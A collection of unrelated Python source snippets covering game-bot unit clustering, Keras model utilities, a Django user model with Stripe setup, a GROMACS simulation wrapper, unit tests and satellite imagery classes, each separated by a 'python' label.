List[Units] = [] # import time # ns_pf = time.perf_counter_ns() numpy_vectors: List[np.ndarray] = [] for unit in units: numpy_vectors.append(np.array([unit.position.x, unit.position.y])) if numpy_vectors: clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(numpy_vectors) # print(clustering.labels_) for index in range(0, len(clustering.labels_)): unit = units[index] if unit.type_id in self.unit_values.combat_ignore: continue label = clustering.labels_[index] if label >= len(groups): groups.append(Units([unit], self.ai)) else: groups[label].append(unit) # for label in clustering.labels_: # ns_pf = time.perf_counter_ns() - ns_pf # print(f"Own unit grouping (v2) took {ns_pf / 1000 / 1000} ms. groups: {len(groups)} units: {len(units)}") return [CombatUnits(u, self.knowledge) for u in groups] def group_enemy_units(self) -> List[CombatUnits]: groups: List[Units] = [] import time ns_pf = time.perf_counter_ns() if self.cache.enemy_numpy_vectors: clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(self.cache.enemy_numpy_vectors) # print(clustering.labels_) units = self.ai.all_enemy_units for index in range(0, len(clustering.labels_)): unit = units[index] if unit.type_id in self.unit_values.combat_ignore or not unit.can_be_attacked: continue label = clustering.labels_[index] if label >= len(groups): groups.append(Units([unit], self.ai)) else: groups[label].append(unit) # for label in clustering.labels_: ns_pf = time.perf_counter_ns() - ns_pf # print(f"Enemy unit grouping (v2) took {ns_pf / 1000 / 1000} ms. groups: {len(groups)}") return [CombatUnits(u, self.knowledge) for u in groups]
python
names = [] while True: name = input() if name == '.': break names.append(name) print(names) print(len(names))
python
import ctypes import cairo from pygame.rect import Rect def get_rect_by_size(upper_corner, size): return Rect(*upper_corner, size, size) PyBUF_READ = 0x100 PyBUF_WRITE = 0x200 def get_cairo_surface(pygame_surface): """ Black magic. """ class Surface(ctypes.Structure): _fields_ = [ ( 'HEAD', ctypes.c_byte * object.__basicsize__), ( 'SDL_Surface', ctypes.c_void_p)] class SDL_Surface(ctypes.Structure): _fields_ = [ ( 'flags', ctypes.c_uint), ( 'SDL_PixelFormat', ctypes.c_void_p), ( 'w', ctypes.c_int), ( 'h', ctypes.c_int), ( 'pitch', ctypes.c_ushort), ( 'pixels', ctypes.c_void_p)] surface = Surface.from_address(id(pygame_surface)) ss = SDL_Surface.from_address(surface.SDL_Surface) pixels_ptr = ctypes.pythonapi.PyMemoryView_FromMemory(ctypes.c_void_p(ss.pixels), ss.pitch * ss.h, PyBUF_WRITE) pixels = ctypes.cast(pixels_ptr, ctypes.py_object).value return cairo.ImageSurface.create_for_data(pixels, cairo.FORMAT_RGB24, ss.w, ss.h, ss.pitch)
python
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Utility functions shared between SavedModel saving/loading implementations.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.keras import backend as K from tensorflow.python.keras.utils import tf_utils from tensorflow.python.util import tf_inspect def use_wrapped_call(layer, call_fn): """Creates fn that adds the losses returned by call_fn & returns the outputs. Args: layer: A Keras layer object call_fn: tf.function that takes layer inputs (and possibly a training arg), and returns a tuple of (outputs, list of losses). Returns: function that calls call_fn and returns the outputs. Losses returned by call_fn are added to the layer losses. """ training_arg_index = get_training_arg_index(layer) def wrapped_call(inputs, *args, **kwargs): """Returns the outputs from the call_fn, and adds the losses.""" if layer._expects_training_arg: # pylint: disable=protected-access training = get_training_arg(training_arg_index, args, kwargs) if training is None: training = K.learning_phase() args = list(args) kwargs = kwargs.copy() def replace_training_and_call(training): new_args, new_kwargs = set_training_arg(training, training_arg_index, args, kwargs) return call_fn(inputs, *new_args, **new_kwargs) outputs, losses = tf_utils.smart_cond( training, lambda: replace_training_and_call(True), lambda: replace_training_and_call(False)) else: outputs, losses = call_fn(inputs) layer.add_loss(losses, inputs) return outputs return wrapped_call def get_training_arg_index(layer): """Returns the index of 'training' in the layer call function arguments. Args: layer: Keras layer Returns: - n: index of 'training' in the call function arguments. - -1: if 'training' is not found in the arguments, but layer.call accepts variable keyword arguments - None: if layer doesn't expect a training argument. """ if not layer._expects_training_arg: # pylint: disable=protected-access return None arg_list = tf_inspect.getfullargspec(layer.call).args if tf_inspect.ismethod(layer.call): arg_list = arg_list[1:] if 'training' in arg_list: return arg_list.index('training') else: return -1 def set_training_arg(training, index, args, kwargs): if index is None: pass elif index >= 0 and len(args) > index: args[index] = training else: kwargs['training'] = training return args, kwargs def get_training_arg(index, args, kwargs): if index is None: return None elif index >= 0 and len(args) > index: return args[index] else: return kwargs.get('training', None)
python
from django.conf import settings from django.contrib.auth.models import AbstractUser from django.db.models import CharField from django.db.models.signals import post_save from django.urls import reverse from django.utils.translation import gettext_lazy as _ from django.core.mail import EmailMultiAlternatives from django.dispatch import receiver from django.template.loader import render_to_string from django_rest_passwordreset.signals import reset_password_token_created import stripe stripe.api_key = settings.STRIPE_SECRET_KEY class User(AbstractUser): """ Default custom user model for mentors. If adding fields that need to be filled at user signup, check forms.SignupForm and forms.SocialSignupForms accordingly. """ #: First and last name do not cover name patterns around the globe name = CharField(_("Name of User"), blank=True, max_length=255) stripe_account_id = CharField(max_length=100) stripe_customer_id = CharField(max_length=100) def get_absolute_url(self): """Get url for user's detail view. Returns: str: URL for user detail. """ return reverse("users:detail", kwargs={"username": self.username}) def post_save_user_receiver(sender, instance, created, **kwargs): if created: instance.name = f"{instance.first_name} {instance.last_name}" account = stripe.Account.create( type='express', ) instance.stripe_account_id = account["id"] customer = stripe.Customer.create( email=instance.email, name=instance.name ) instance.stripe_customer_id = customer["id"] instance.save() # Avoid circular import from mentors.mentors.models import Mentor Mentor.objects.create(user=instance) post_save.connect(post_save_user_receiver, sender=User) @receiver(reset_password_token_created) def password_reset_token_created(sender, instance, reset_password_token, *args, **kwargs): """ Handles password reset tokens When a token is created, an e-mail needs to be sent to the user :param sender: View Class that sent the signal :param instance: View Instance that sent the signal :param reset_password_token: Token Model Object :param args: :param kwargs: :return: """ # send an e-mail to the user domain = "https://domain.com" if settings.DEBUG: domain = "http://localhost:3000" reset_password_url = domain + '/accounts/reset-password/confirm/' + reset_password_token.key context = { 'current_user': reset_password_token.user, 'username': reset_password_token.user.username, 'email': reset_password_token.user.email, 'reset_password_url': reset_password_url, 'domain': domain } # render email text email_html_message = render_to_string('email/user_reset_password.html', context) email_plaintext_message = render_to_string('email/user_reset_password.txt', context) msg = EmailMultiAlternatives( # title: "Password Reset for {title}".format(title="Mentors"), # message: email_plaintext_message, # from: "[email protected]", # to: [reset_password_token.user.email] ) msg.attach_alternative(email_html_message, "text/html") msg.send()
python
import numpy as np class Neurons: def __init__(self, n_inputs, n_neurons): self.weights = 1 * np.random.randn(n_inputs, n_neurons) self.biases = np.zeros((1, n_neurons))
python
import abc import glob import logging import os import subprocess as sp from collections import OrderedDict from enum import Enum from paprika.utils import get_dict_without_keys from .simulation import Simulation logger = logging.getLogger(__name__) class GROMACS(Simulation, abc.ABC): """ A wrapper that can be used to set GROMACS simulation parameters. .. todo :: possibly modify this module to use the official python wrapper of GROMACS. Below is an example of the configuration file (``gromacs.mdp``) generated by the wrapper. The class property associated with defining the configuration variables is shown in brackets. .. code :: title = NPT MD Simulation ; [self.title] ; Run control [self.control] nsteps = 1500000 nstxout = 500 nstlog = 500 nstenergy = 500 nstcalcenergy = 500 dt = 0.002 integrator = md ; Nonbonded options [self.nb_method] cutoff-scheme = Verlet ns_type = grid nstlist = 10 rlist = 0.9 rcoulomb = 0.9 rvdw = 0.9 coulombtype = PME pme_order = 4 fourierspacing = 0.16 vdwtype = Cut-off DispCorr = EnerPres pbc = xyz ; Bond constraints [self.constraints] constraint-algorithm = lincs constraints = h-bonds lincs_iter = 1 lincs_order = 4 ; Temperature coupling [self.thermostat] tcoupl = v-rescale tc-grps = System ref_t = 298.15 tau_t = 0.1 gen_vel = no ; Pressure coupling [self.barostat] pcoupl = Berendsen pcoupltype = isotropic tau_p = 2.0 ref_p = 1.01325 compressibility = 4.5e-05 """ class Thermostat(Enum): """ An enumeration of the different themostat implemented in GROMACS. """ Off = "no" Berendsen = "berendsen" NoseHoover = "nose-hoover" Andersen1 = "andersen" Andersen2 = "andersen-massive" VelocityRescaling = "v-rescale" class Barostat(Enum): """ An enumeration of the different barostat implemented in GROMACS. """ Off = "no" Berendsen = "Berendsen" ParrinelloRahman = "Parrinello-Rahman" MMTK = "MTTK" class Integrator(Enum): """ An enumeration of the different integrators implemented in GROMACS. """ LeapFrog = "md" VelocityVerlet = "md-vv" VelocityVerletAveK = "md-vv-avek" LangevinDynamics = "sd" BrownianDynamics = "bd" class Optimizer(Enum): """ An enumeration of the different minimization algorithm implemented in GROMACS. """ SteepestDescent = "steep" ConjugateGradient = "cg" Broyden = "l-bfgs" class BoxScaling(Enum): """ An enumeration of the different PBC scaling options when running constant pressure simulations in GROMACS. """ Isotropic = "isotropic" Semiisotropic = "semiisotropic" Anisotropic = "anisotropic" SurfaceTension = "surface-tension" class Constraints(Enum): """ An enumeration of the different bond constraint options in GROMACS. """ Off = "none" HBonds = "h-bonds" AllBonds = "all-bonds" HAngles = "h-angles" AllAngles = "all-angles" @property def index_file(self) -> str: """os.PathLike: GROMACS index file that specifies ``groups`` in the system. This is optional in a GROMACS simulation.""" return self._index_file @index_file.setter def index_file(self, value: str): self._index_file = value @property def checkpoint(self) -> str: """os.PathLike: Checkpoint file (extension is ``.cpt``) for starting a simulation from a previous state.""" return self._checkpoint @checkpoint.setter def checkpoint(self, value: str): self._checkpoint = value @property def control(self): """dict: Dictionary for the output control of the MD simulation (frequency of energy, trajectory etc).""" return self._control @control.setter def control(self, value): self._control = value @property def nb_method(self): """dict: Dictionary for the non-bonded method options (cutoffs and methods).""" return self._nb_method @nb_method.setter def nb_method(self, value): self._nb_method = value @property def constraints(self): """dict: Dictionary for the bond constraint options (LINCS or SHAKE).""" return self._constraints @constraints.setter def constraints(self, value): self._constraints = value @property def tc_groups(self) -> list: """ list: List of groups to apply thermostat "separately" based on the groups defined in the ``index_file``. Below is an example of applying the thermostat for different groups separately in a GROMACS input file .. code :: tcoupl = v-rescale tc-grps = HOST GUEST HOH tau-t = 0.1 0.1 0.1 ref-t = 300 300 300 """ return self._tc_groups @tc_groups.setter def tc_groups(self, value: list): self._tc_groups = value @property def prefix(self): """str: The prefix for file names generated from this simulation.""" return self._prefix @prefix.setter def prefix(self, new_prefix): self._prefix = new_prefix self.input = new_prefix + ".mdp" self.output = new_prefix + ".mdout" self.logfile = new_prefix + ".log" self.tpr = new_prefix + ".tpr" @property def custom_mdrun_command(self) -> str: """Custom commands for ``mdrun``. The default commands parsed to ``mdrun`` if all the variables are defined is .. code:: gmx mdrun -deffnm ``prefix`` -nt ``n_threads`` -gpu_id ``gpu_devices`` -plumed ``plumed.dat`` This is useful depending on how GROMACS was compiled, e.g. if GROMACS is compiled with the MPI library the you will need to use the command below: .. code:: mpirun -np 6 gmx_mpi mdrun -deffnm ``prefix`` -ntomp 1 -gpu_id 0 -plumed ``plumed.dat`` """ return self._custom_mdrun_command @custom_mdrun_command.setter def custom_mdrun_command(self, value: str): self._custom_mdrun_command = value @property def grompp_maxwarn(self) -> int: """int: Maximum number of warnings for GROMPP to ignore. default=1.""" return self._grompp_maxwarn @grompp_maxwarn.setter def grompp_maxwarn(self, value: int): self._grompp_maxwarn = value def __init__(self): super().__init__() # I/O self._index_file = None self._custom_mdrun_command = None self._tc_groups = None self._grompp_maxwarn = 1 # File names self.input = self._prefix + ".mdp" self.output = self._prefix + ".mdout" self._checkpoint = None self.logfile = self._prefix + ".log" self.tpr = self._prefix + ".tpr" # Input file self._control = OrderedDict() self._control["nsteps"] = 5000 self._control["nstxout"] = 500 self._control["nstlog"] = 500 self._control["nstenergy"] = 500 self._control["nstcalcenergy"] = 500 self._constraints = OrderedDict() self._constraints["constraint-algorithm"] = "lincs" self._constraints["constraints"] = self.Constraints.HBonds.value self._constraints["lincs_iter"] = 1 self._constraints["lincs_order"] = 4 self._nb_method = OrderedDict() self._nb_method["cutoff-scheme"] = "Verlet" self._nb_method["ns-type"] = "grid" self._nb_method["nstlist"] = 10 self._nb_method["rlist"] = 0.9 self._nb_method["rcoulomb"] = 0.9 self._nb_method["rvdw"] = 0.9 self._nb_method["coulombtype"] = "PME" self._nb_method["pme_order"] = 4 self._nb_method["fourierspacing"] = 0.16 self._nb_method["vdwtype"] = "Cut-off" self._nb_method["DispCorr"] = "EnerPres" self._nb_method["pbc"] = "xyz" def _config_min(self, optimizer): """ Configure input settings for a minimization run. Parameters ---------- optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent Algorithm for energy minimization, keyword in the parenthesis are the options for the input file. **(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden` (``l-bfgs``). """ self.constraints["continuation"] = "no" self.control["integrator"] = optimizer.value self.control["emtol"] = 10.0 self.control["emstep"] = 0.01 self.control["nsteps"] = 5000 def _config_md(self, integrator, thermostat): """ Configure input setting for a MD. Parameters ---------- integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). """ self.control["dt"] = 0.002 self.control["integrator"] = integrator.value self.constraints["continuation"] = "yes" self.thermostat["tc-grps"] = "System" self.thermostat["ref_t"] = self.temperature if ( integrator != self.Integrator.LangevinDynamics and integrator != self.Integrator.BrownianDynamics ): self.thermostat["tcoupl"] = thermostat.value self.thermostat["tau_t"] = 1.0 else: self.thermostat["tau_t"] = 0.1 def config_vac_min(self, optimizer=Optimizer.SteepestDescent): """ Configure a reasonable input setting for a MD run in vacuum. `Users can override the parameters set by this method.` .. note :: Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a "pseudo-PBC" environment. Make sure the coordinates ``.gro`` file has an expanded box, which you can do using ``gmx editconf``. See the discussion on https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2. Parameters ---------- optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent Algorithm for energy minimization, keyword in the parenthesis are the options for the input file. **(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden` (``l-bfgs``). """ self.title = "Vacuum Minimization" self._config_min(optimizer) self.nb_method["pbc"] = "xyz" self.nb_method["ns_type"] = "grid" self.nb_method["nstlist"] = 10 self.nb_method["rlist"] = 333.3 self.nb_method["coulombtype"] = "Cut-off" self.nb_method["rcoulomb"] = 333.3 self.nb_method["vdwtype"] = "Cut-off" self.nb_method["rvdw"] = 333.3 self.nb_method["DispCorr"] = "no" def config_vac_md( self, integrator=Integrator.LeapFrog, thermostat=Thermostat.VelocityRescaling ): """ Configure a reasonable input setting for a MD run in vacuum. `Users can override the parameters set by this method.` .. note :: Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a "pseudo-PBC" environment. Make sure the coordinates ``.gro`` file has an expanded box, which you set using ``gmx editconf``. See the discussion on https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2. Parameters ---------- integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling Option to choose one of five thermostat implemented in GROMACS, keywords in the parenthesis are the options for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover` (``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``), and **(6)** `VelocityRescaling` (``v-rescale``). """ self.title = "Vacuum MD Simulation" self._config_md(integrator, thermostat) if self.checkpoint is None: self.constraints["continuation"] = "no" else: self.constraints["continuation"] = "yes" self.nb_method["pbc"] = "xyz" self.nb_method["ns_type"] = "grid" self.nb_method["nstlist"] = 10 self.nb_method["rlist"] = 333.3 self.nb_method["coulombtype"] = "Cut-off" self.nb_method["rcoulomb"] = 333.3 self.nb_method["vdwtype"] = "Cut-off" self.nb_method["rvdw"] = 333.3 self.nb_method["DispCorr"] = "no" def config_pbc_min(self, optimizer=Optimizer.SteepestDescent): """ Configure a reasonable input setting for an energy minimization run with periodic boundary conditions. `Users can override the parameters set by this method.` Parameters ---------- optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent Algorithm for energy minimization, keywords in the parenthesis are the options for the input file. **(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden` (``l-bfgs``). """ self.title = "PBC Minimization" self._config_min(optimizer) self.nb_method["nstlist"] = 10 def config_pbc_md( self, ensemble=Simulation.Ensemble.NPT, integrator=Integrator.LeapFrog, thermostat=Thermostat.VelocityRescaling, barostat=Barostat.Berendsen, ): """ Configure a reasonable input setting for a MD run with periodic boundary conditions. `Users can override the parameters set by this method.` Parameters ---------- ensemble: :class:`Simulation.Ensemble`, default=Ensemble.NPT Configure a MD simulation with NVE, NVT or NPT thermodynamic ensemble. integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling Option to choose one of five thermostat implemented in GROMACS, keywords in the parenthesis are the options for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover` (``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``), and **(6)** `VelocityRescaling` (``v-rescale``). barostat: :class:`GROMACS.Barostat`, default=Barostat.Berendsen Option to choose one of three barostat implemented in GROMACS, keywords in the parenthesis are the options for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `ParrinelloRahman` (``Parrinello-Rahman``), and **(4)** `MMTK` (``MTTK``). """ self.title = f"{ensemble.value} MD Simulation" self._config_md(integrator, thermostat) if self.checkpoint is None: self.constraints["continuation"] = "no" else: self.constraints["continuation"] = "yes" if ensemble == self.Ensemble.NVE: self.thermostat["tcoupl"] = self.Thermostat.Off.value self.barostat["pcoupl"] = self.Barostat.Off.value del self.thermostat["tc-grps"] del self.thermostat["ref_t"] del self.thermostat["tau_t"] elif ensemble == self.Ensemble.NVT: self.thermostat["gen_vel"] = "yes" self.thermostat["gen_temp"] = self.temperature self.thermostat["gen_seed"] = -1 self.barostat["pcoupl"] = self.Barostat.Off.value elif ensemble == self.Ensemble.NPT: self.thermostat["gen_vel"] = "no" self.barostat["pcoupl"] = barostat.value if barostat.value != self.Barostat.Off: self.barostat["pcoupltype"] = self.BoxScaling.Isotropic.value self.barostat["tau_p"] = 2.0 self.barostat["ref_p"] = self.pressure self.barostat["compressibility"] = 4.5e-5 @staticmethod def _write_dict_to_mdp(f, dictionary): """ Write dictionary to file, following GROMACS format. Parameters ---------- f : TextIO File where the dictionary should be written. dictionary : dict Dictionary of values. """ for key, val in dictionary.items(): if val is not None and not isinstance(val, list): f.write("{:25s} {:s}\n".format(key, "= " + str(val))) elif isinstance(val, list): f.write("{:25s} {:s}".format(key, "= ")) for i in val: f.write("{:s} ".format(str(i))) f.write("\n") def _write_input_file(self): """ Write the input file specification to file. """ logger.debug("Writing {}".format(self.input)) with open(os.path.join(self.path, self.input), "w") as mdp: mdp.write("{:25s} {:s}\n".format("title", "= " + self.title)) mdp.write("; Run control\n") self._write_dict_to_mdp(mdp, self.control) mdp.write("; Nonbonded options\n") self._write_dict_to_mdp(mdp, self.nb_method) mdp.write("; Bond constraints\n") if self.constraints["constraint-algorithm"].lower() == "shake": self._write_dict_to_mdp( mdp, get_dict_without_keys( self.constraints, "lincs_iter", "lincs_order" ), ) else: self._write_dict_to_mdp(mdp, self.constraints) if self.thermostat: mdp.write("; Temperature coupling\n") # Check if users specify different temperature groups if self.tc_groups: tau_t = self.thermostat["tau_t"] self.thermostat["tc-grps"] = self.tc_groups self.thermostat["tau_t"] = [tau_t] * len(self.tc_groups) self.thermostat["ref_t"] = [self.temperature] * len(self.tc_groups) self._write_dict_to_mdp(mdp, self.thermostat) if self.barostat: mdp.write("; Pressure coupling\n") self._write_dict_to_mdp(mdp, self.barostat) def run(self, run_grompp=True, overwrite=False, fail_ok=False): """ Method to run Molecular Dynamics simulation with GROMACS. Parameters ---------- run_grompp: bool, optional, default=True Run GROMPP to generate ``.tpr`` file before running MDRUN overwrite: bool, optional, default=False Whether to overwrite simulation files. fail_ok: bool, optional, default=False Whether a failing simulation should stop execution of ``pAPRika``. """ if overwrite or not self.check_complete(): # Check the type of simulation: Minimization, NVT or NPT if self.control["integrator"] in [ self.Optimizer.SteepestDescent.value, self.Optimizer.ConjugateGradient.value, self.Optimizer.Broyden.value, ]: logger.info("Running Minimization at {}".format(self.path)) elif self.control["integrator"] in [ self.Integrator.LeapFrog.value, self.Integrator.VelocityVerlet.value, self.Integrator.VelocityVerletAveK.value, self.Integrator.LangevinDynamics.value, self.Integrator.BrownianDynamics.value, ]: if self.thermostat and self.barostat: logger.info("Running NPT MD at {}".format(self.path)) elif not self.barostat: logger.info("Running NVT MD at {}".format(self.path)) else: logger.info("Running NVE MD at {}".format(self.path)) # Set Plumed kernel library to path self._set_plumed_kernel() # create executable list for GROMPP # gmx grompp -f npt.mdp -c coordinates.gro -p topology.top -t checkpoint.cpt -o npt.tpr -n index.ndx if run_grompp: # Clean previously generated files for file in glob.glob(os.path.join(self.path, f"{self.prefix}*")): os.remove(file) # Write MDF input file self._write_input_file() # GROMPP list grompp_list = [self.executable, "grompp"] grompp_list += [ "-f", self.input, "-p", self.topology, "-c", self.coordinates, "-o", self.tpr, "-po", self.output, "-maxwarn", str(self.grompp_maxwarn), ] if self.checkpoint: grompp_list += ["-t", self.checkpoint] if self.index_file: grompp_list += ["-n", self.index_file] # Run GROMPP grompp_output = sp.Popen( grompp_list, cwd=self.path, stdout=sp.PIPE, stderr=sp.PIPE, env=os.environ, ) grompp_stdout = grompp_output.stdout.read().splitlines() grompp_stderr = grompp_output.stderr.read().splitlines() # Report any stdout/stderr which are output from execution if grompp_stdout: logger.info("STDOUT received from GROMACS execution") for line in grompp_stdout: logger.info(line) # Not sure how to do this more efficiently/elegantly, "subprocess" seems to treat everything # Gromacs spits out from "grompp" as an error. if grompp_stderr and any( ["Error" in line.decode("utf-8").strip() for line in grompp_stderr] ): logger.info("STDERR received from GROMACS execution") for line in grompp_stderr: logger.error(line) # create executable list for MDRUN # gmx_mpi mdrun -v -deffnm npt -nt 6 -gpu_id 0 -plumed plumed.dat mdrun_list = [] # Add any user specified command if self.custom_mdrun_command is not None: if self.executable not in self.custom_mdrun_command: mdrun_list += [self.executable] if "mdrun" not in self.custom_mdrun_command: mdrun_list += ["mdrun"] mdrun_list += self.custom_mdrun_command.split() # Output prefix if "-deffnm" not in self.custom_mdrun_command: mdrun_list += ["-deffnm", self.prefix] # Add number of threads if not already specified in custom if not any( [ cpu in self.custom_mdrun_command for cpu in ["-nt", "-ntomp", "-ntmpi", "-ntomp_pme"] ] ): mdrun_list += [ "-ntomp" if "mpi" in self.executable else "-nt", str(self.n_threads), ] # Add gpu id if not already specified in custom if ( self.gpu_devices is not None and "-gpu_id" not in self.custom_mdrun_command ): mdrun_list += ["-gpu_id", str(self.gpu_devices)] # Add plumed file if not already specified in custom if self.plumed_file and "-plumed" not in self.custom_mdrun_command: mdrun_list += ["-plumed", self.plumed_file] else: mdrun_list += [self.executable, "mdrun", "-deffnm", self.prefix] # Add number of threads mdrun_list += [ "-ntomp" if "mpi" in self.executable else "-nt", str(self.n_threads), ] # Add gpu id if self.gpu_devices is not None: mdrun_list += ["-gpu_id", str(self.gpu_devices)] # Add plumed file if self.plumed_file is not None: mdrun_list += ["-plumed", self.plumed_file] # Run MDRUN mdrun_output = sp.Popen( mdrun_list, cwd=self.path, stdout=sp.PIPE, stderr=sp.PIPE, env=os.environ, ) mdrun_out = mdrun_output.stdout.read().splitlines() mdrun_err = mdrun_output.stderr.read().splitlines() # Report any stdout/stderr which are output from execution if mdrun_out: logger.info("STDOUT received from MDRUN execution") for line in mdrun_out: logger.info(line) # Same reasoning as before for "grompp". if mdrun_err and any( ["Error" in line.decode("utf-8").strip() for line in mdrun_err] ): logger.info("STDERR received from MDRUN execution") for line in mdrun_err: logger.error(line) # Check completion status if ( self.control["integrator"] in [ self.Optimizer.SteepestDescent.value, self.Optimizer.ConjugateGradient.value, self.Optimizer.Broyden.value, ] and self.check_complete() ): logger.info("Minimization completed...") elif self.check_complete(): logger.info("Simulation completed...") else: logger.info( "Simulation did not complete when executing the following ...." ) logger.info(" ".join(mdrun_list)) if not fail_ok: raise Exception( "Exiting due to failed simulation! Check logging info." ) else: logger.info( "Completed output detected ... Skipping. Use: run(overwrite=True) to overwrite" ) def check_complete(self, alternate_file=None): """ Check for the string "step N" in ``self.output`` file. If "step N" is found, then the simulation completed. Parameters ---------- alternate_file : os.PathLike, optional, default=None If present, check for "step N" in this file rather than ``self.output``. Default: None Returns ------- complete : bool True if "step N" is found in file. False, otherwise. """ # Assume not completed complete = False if alternate_file: output_file = alternate_file else: output_file = os.path.join(self.path, self.logfile) if os.path.isfile(output_file): with open(output_file, "r") as f: strings = f.read() if ( f" step {self.control['nsteps']} " in strings or "Finished mdrun" in strings ): complete = True if complete: logger.debug("{} has TIMINGS".format(output_file)) else: logger.debug("{} does not have TIMINGS".format(output_file)) return complete
python
a1 = int(input()) a2 = int(input()) n = int(input()) for p in range(a1, ord(chr(a2 - 1)) + 1): for i in range(1, (n - 1) + 1): for j in range(1, (int((n / 2) - 1)) + 1): if (p % 2 != 0) and (((i + j + p) % 2) != 0): print(f"{chr(p)}-{i}{j}{p}")
python
# Copyright 2020 The Private Cardinality Estimation Framework Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for wfa_cardinality_estimation_evaluation_framework.common.random.""" from absl.testing import absltest import numpy as np from wfa_cardinality_estimation_evaluation_framework.common import random class PlottingTest(absltest.TestCase): def test_choice_fast_same_random_state_same_output(self): rs1 = np.random.RandomState(1) rs2 = np.random.RandomState(1) a = random.choice_fast(10000, 5000, rs1) b = random.choice_fast(10000, 5000, rs2) self.assertSameElements(a, b) def test_choice_fast_len_is_m(self): for i in range(1000): a = random.choice_fast(10000, i) self.assertLen(a, i) def test_choice_fast_choose_elements_from_list(self): for i in range(50, 500): # Get a random list of numbers from 0 to 5000 size i elements = np.random.randint(0, 5000, i) # Choose up to i elements from that list chosen = random.choice_fast(elements, np.random.randint(1, i)) # Make sure chosen elements are actually from our original elements. for element in chosen: self.assertTrue(element in elements) def test_choice_fast_is_unique(self): for i in range(50, 500): chosen = random.choice_fast(500, i) no_repeats = set(chosen) self.assertTrue(len(chosen) == len(no_repeats)) if __name__ == '__main__': absltest.main()
python
from gbdxtools.images.worldview import WorldViewImage from gbdxtools.images.drivers import WorldViewDriver from gbdxtools.images.util import vector_services_query from gbdxtools.rda.interface import RDA rda = RDA() band_types = { 'MS': 'BGRN', 'Panchromatic': 'PAN', 'Pan': 'PAN', 'pan': 'PAN' } class GeoEyeDriver(WorldViewDriver): __image_option_defaults__ = {"correctionType": "DN"} class GE01(WorldViewImage): __Driver__ = GeoEyeDriver @property def _rgb_bands(self): return [2,1,0]
python
